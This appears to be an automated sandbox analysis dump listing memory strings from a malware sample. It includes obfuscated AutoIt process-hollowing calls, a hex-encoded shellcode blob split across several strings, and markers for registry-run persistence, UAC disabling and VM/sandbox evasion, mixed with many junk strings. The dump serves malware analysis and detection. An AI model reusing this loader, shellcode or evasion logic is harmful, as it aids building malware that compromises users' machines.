Binary or memory string: dllcall("ntdll.dll", "int", "n"&"tunm"&"apviewo"&"fsection", "ptr", $handlerpro, "ptr", $paddress) |
memstr_d2aa3485-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $acall = dllcall("kernel32.dll", "bool", "iswow"&"64pr"&"oce"&"ss", "handle", $handlerpro, "bool*", 0) |
memstr_c0711567-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $binbuffer = dllstructcreate("byte[" & binarylen($binary) & "]")/ |
memstr_ae777ec9-f |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $ret = dllcall("user32.dll", "int", "callwi" & "ndowprocw", "ptr", dllstructgetptr($bufferasm), "ws" & "tr", $sexemodule, "ptr", dllstructgetptr($binbuffer), "int", 0, "int", 0)w |
memstr_393d9395-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $ssssss = "/x6/e84e//////6b//65//72//6e//65//6c//33//32//////6e//74//64//6c//6c//////////////////////////////////////////////////////////////////////////////////////////////////////5b8bfc6a42e8bb/3////8b54242889118b54242c6a3ee8aa/3////89116a4ae8a1/3////89396a1e6a3ce89d/3////6a2268f4//////e891/3////6a266a24e888/3////6a2a6a4/e87f/3////"u |
memstr_04bc1b7e-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $ssssss &= "6a2e6a/ce876/3////6a3268c8//////e86a/3////6a2ae85c/3////8b/9c7/144//////6a12e84d/3////685be814cf51e879/3////6a3ee83b/3////8bd16a1ee832/3////6a4/ff32ff31ffd/6a12e823/3////685be814cf51e84f/3////6a1ee811/3////8b/98b513c6a3ee8/5/3////8b39/3fa6a22e8fa/2////8b/968f8//////5751ffd/6a//e8e8/2////6888feb31651e814/3////6a2ee8d6/2//"u |
memstr_acb16668-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $ssssss &= "//8b396a2ae8cd/2////8b116a42e8c4/2////57526a//6a//6a/46a//6a//6a//6a//ff31ffd/6a12e8a9/2////68d/371/f251e8d5/2////6a22e897/2////8b116a2ee88e/2////8b/9ff7234ff31ffd/6a//e87e/2////689c951a6e51e8aa/2////6a22e86c/2////8b118b396a2ee861/2////8b/96a4/68//3/////ff725/ff7734ff31ffd/6a36e847/2////8bd16a22e83e/2////8b396a3ee835/2//"u |
memstr_70936b45-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $ssssss &= "//8b316a22e82c/2////8b/16a2ee823/2////8b/952ff775456ff7/34ff316a//e81//2////68a16a3dd851e83c/2////83c4/cffd/6a12e8f9/1////685be814cf51e825/2////6a22e8e7/1////8b1183c2/66a3ae8db/1////6a/25251ffd/6a36e8ce/1////c7/1////////b828//////6a36e8bc/1////f7216a1ee8b3/1////8b118b523c81c2f8///////3d/6a3ee89f/1/////3116a26e896/1////6a"u |
memstr_0f052803-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $ssssss &= "2852ff316a12e88a/1////685be814cf51e8b6/1////83c4/cffd/6a26e873/1////8b398b/98b71146a3ee865/1/////3316a26e85c/1////8b/98b51/c6a22e85//1////8b/9/351346a46e844/1////8bc16a2ee83b/1////8b/95/ff771/5652ff316a//e82a/1////68a16a3dd851e856/1////83c4/cffd/6a36e813/1////8b1183c2/189116a3ae8/5/1////8b/93bca/f8533ffffff6a32e8f4//////"u |
memstr_ec97cf0e-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $ssssss &= "8b/9c7/1/7///1//6a//e8e5//////68d2c7a76851e811/1////6a32e8d3//////8b116a2ee8ca//////8b/952ff71/4ffd/6a22e8bb//////8b3983c7346a32e8af//////8b318bb6a4//////83c6/86a2ee89d//////8b116a46e894//////516a/45756ff326a//e886//////68a16a3dd851e8b2//////83c4/cffd/6a22e86f//////8b/98b5128/351346a32e86///////8b/981c1b///////89116a//e8"u |
memstr_02b788e9-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $ssssss &= "4f//////68d3c7a7e851e87b//////6a32e83d//////8bd16a2ee834//////8b/9ff32ff71/4ffd/6a//e824//////68883f4a9e51e85///////6a2ee812//////8b/9ff71/4ffd/6a4ae8/4//////8b2161c38bcb/34c24/4c36a//e8f2ffffff6854caaf9151e81e//////6a4/68//1/////ff7424186a//ffd/ff742414e8cfffffff89/183c41/c3e822//////68a44e/eec5/e84b//////83c4/8ff7424/4"u |
memstr_e6e021f4-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $ssssss &= "ffd/ff7424/85/e838//////83c4/8c355525153565733c/648b7/3/8b76/c8b761c8b6e/88b7e2/8b3638471875f38/3f6b74/78/3f4b74/2ebe78bc55f5e5b595a5dc35552515356578b6c241c85ed74438b453c8b542878/3d58b4a188b5a2//3dde33/498b348b/3f533ff33c/fcac84c/74/7c1cf/d/3f8ebf43b7c242/75e18b5a24/3dd668b/c4b8b5a1c/3dd8b/48b/3c55f5e5b595a5dc3c3////////" |
memstr_80a1a5f6-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: @<xbo |
memstr_7e826959-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: g%(ao |
memstr_722a9c72-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: r332o |
memstr_c5312abf-e |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: h)hao |
memstr_d6bad6e1-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: s3tt!ng |
memstr_313da493-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: leh-t"]m |
memstr_739ca6c7-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: stpthso |
memstr_5aa47df9-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: g#hao |
memstr_3a7fa0fa-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: h+>]y |
memstr_1d22cd0a-f |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: g#xbo |
memstr_469dcfc3-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: reg_szy] |
memstr_83f1576d-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: auex*^t |
memstr_8e7ecb4f-d |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: exec8^f |
memstr_6726a6b5-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: h/b^, |
memstr_1d5a3fd7-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: m'a^/ |
memstr_7cb3e771-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 6j^4 |
memstr_c1f2985f-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 6yh$o |
memstr_19d47174-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: eh#o |
memstr_20e766f4-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: @ax$o |
memstr_0fbbbf1d-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: exec//_i |
memstr_3b8edabb-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: h.$_b |
memstr_d5a05f94-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 6(x#o |
memstr_39822b86-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 3!m_+ |
memstr_fc8eb4e0-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: \*.*x#o |
memstr_a6faf1f3-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: exe_ct |
memstr_f4dbe14e-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: m.9xg |
memstr_248af7d0-f |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 646xp |
memstr_2f46ac43-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 25xs |
memstr_5fcd210c-f |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: e($o |
memstr_ac25c2cc-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: @#lx* |
memstr_48738718-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: \*.*qx? |
memstr_a6eea226-d |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: reg_szo |
memstr_07d9be22-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: reg_sz |
memstr_2dbd3589-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: auex*yt |
memstr_b09a04f9-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: vbldr |
memstr_5dbaa3ab-d |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 6zoy) |
memstr_be270eca-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 3udy" |
memstr_366993c8-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 6npy> |
memstr_02afe547-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: gtjy4 |
memstr_923897fd-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dir3ctory_path |
memstr_0210a800-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: program manager |
memstr_403109b7-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: comspec |
memstr_1b9da727-f |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: read_uac |
memstr_09092b70-f |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: vboxservice.exe&zo |
memstr_d68d4b90-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\run |
memstr_3a315f3f-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: hkey_current_user\software\microsoft\windows\currentversion\runhz |
memstr_071cd9ea-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: hkcu64\software\microsoft\windows\currentversion\runwz0 |
memstr_0a40273a-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: scriptdirrz |
memstr_6e6f90be-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: vbsloaderset |
memstr_2c1a5e53-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: key_vbsloader |
memstr_fc9fc995-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: vmcessexists0[} |
memstr_fdd64b68-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: auexin |
memstr_a1f3b784-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: vbox.exeistsz[# |
memstr_6cb5726e-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\runa[ |
memstr_4def25f1-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: taskname |
memstr_a6c5a93c-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: meomrypersistance |
memstr_b39088a7-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: hkey_current_user\software\microsoft\windows\currentversion\run |
memstr_1f202d76-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: disableuac |
memstr_882897c1-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: vbsloaderset't` |
memstr_00cbb45f-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: d:\espacefree |
memstr_df89d330-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: d:\espacefreeit |
memstr_a7b4af61-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: scriptdirtt1 |
memstr_8c641f57-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: hkcu64\software\microsoft\windows\currentversion\runst |
memstr_a9254601-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: hklm64\software\microsoft\windows\currentversion\policies\system |
memstr_b846eb1c-d |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: anti_sandbox_vm |
memstr_8b4a7425-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: vboxtray.exe |
memstr_61fe1ce7-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: script |
memstr_38de9fc1-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: anti_botkill*us |
memstr_22580a70-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: startupkey1u~ |
memstr_d3c41a2f-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: startup1 |
memstr_0030079e-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: shortx |
memstr_5a2ef1c9-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: exe_c?w |
memstr_8d957dfa-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: @eewo |
memstr_fba3a10c-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: /trxwb |
memstr_bc1d0dc6-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 0skhcmrwx |
memstr_ca687d2d-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: "tw^ |
memstr_df616826-e |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: le6xt |
memstr_47f41377-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: auex |
memstr_6b1ab3a2-f |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ware' |
memstr_c815319e-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: sw_hide |
memstr_eb1acfe9-e |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: auexsp |
memstr_91e64536-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: execup |
memstr_991ea283-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: reg_szdpn |
memstr_dc766901-e |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: @$wp] |
memstr_536cbe91-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: da3m. |
memstr_7eb8d369-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 6y@qj |
memstr_8a10d363-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: gxsqy |
memstr_028c3de2-d |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: reg_szt |
memstr_77b06294-d |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: reg_sz2r |
memstr_3d96ecca-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: le6qt |
memstr_65140e00-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 6~ero |
memstr_f5b81a22-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ni_set |
memstr_67451a9b-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\run9s |
memstr_011407a7-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: c:\users\user\wrse\nngqrvwq.xl |
memstr_2617ed09-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: .\device\harddiskvolume3us |
memstr_d8e58357-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: .\device\harddiskvolume3 |
memstr_a1a5668e-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: .\device\harddiskvolume37 |
memstr_9263815f-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: .\device\harddiskvolume3 |
memstr_7922f5b3-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: .\device\harddiskvolume3| |
memstr_9288a04d-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: enableluatware\microso |
memstr_f02350a7-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: reg_dword |
memstr_2dde727e-e |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: vmwareuser.exe/ |
memstr_74b289a0-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: install_pathchine\soft& |
memstr_7a072fee-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: install_folder9 |
memstr_2486c7aa-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ini_settings0 |
memstr_07ec74cd-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: startup2 |
memstr_0b9e660e-d |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: settingsfn |
memstr_7b72133b-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: startupkey |
memstr_d5b7d2f4-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: install_foldere /sc mi |
memstr_a359fa7d-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: update.vbsn |
memstr_93feacee-e |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: install_patha |
memstr_36881846-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: settingsfnx |
memstr_7d66eb9e-f |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: install_folders |
memstr_91d2641c-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dir3ctory_pathej |
memstr_e44b06b7-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: vmwareservice.exem |
memstr_a7490cac-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: install_folderd |
memstr_5f7bbed3-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: update.vbs_ |
memstr_abeff0a7-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ini_settingsv |
memstr_c8452f69-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dir3ctory_pathe |
memstr_4065536c-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: start.vbs |
memstr_dbeb4a65-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ini_settings |
memstr_e181be5f-f |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: windowsrepaire |
memstr_3af8a476-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: enablelua |
memstr_b30dc0a8-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: start.lnk |
memstr_1f0244ed-e |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: startupkeyware\microso |
memstr_7149cfa1-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: install_path |
memstr_202f3d4b-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: const hidden = 0 |
memstr_4cbd44f1-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: install_folder |
memstr_c1b7a60c-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: qsprs |
memstr_706951ab-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: @(rt |
memstr_17d95afa-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: tam*.b |
memstr_0045b4eb-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: @x(rt |
memstr_e3c9094a-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: hmhqt |
memstr_91b6f8df-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: crlfl |
memstr_084bb939-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: counter |
memstr_d9895a5d-2 |
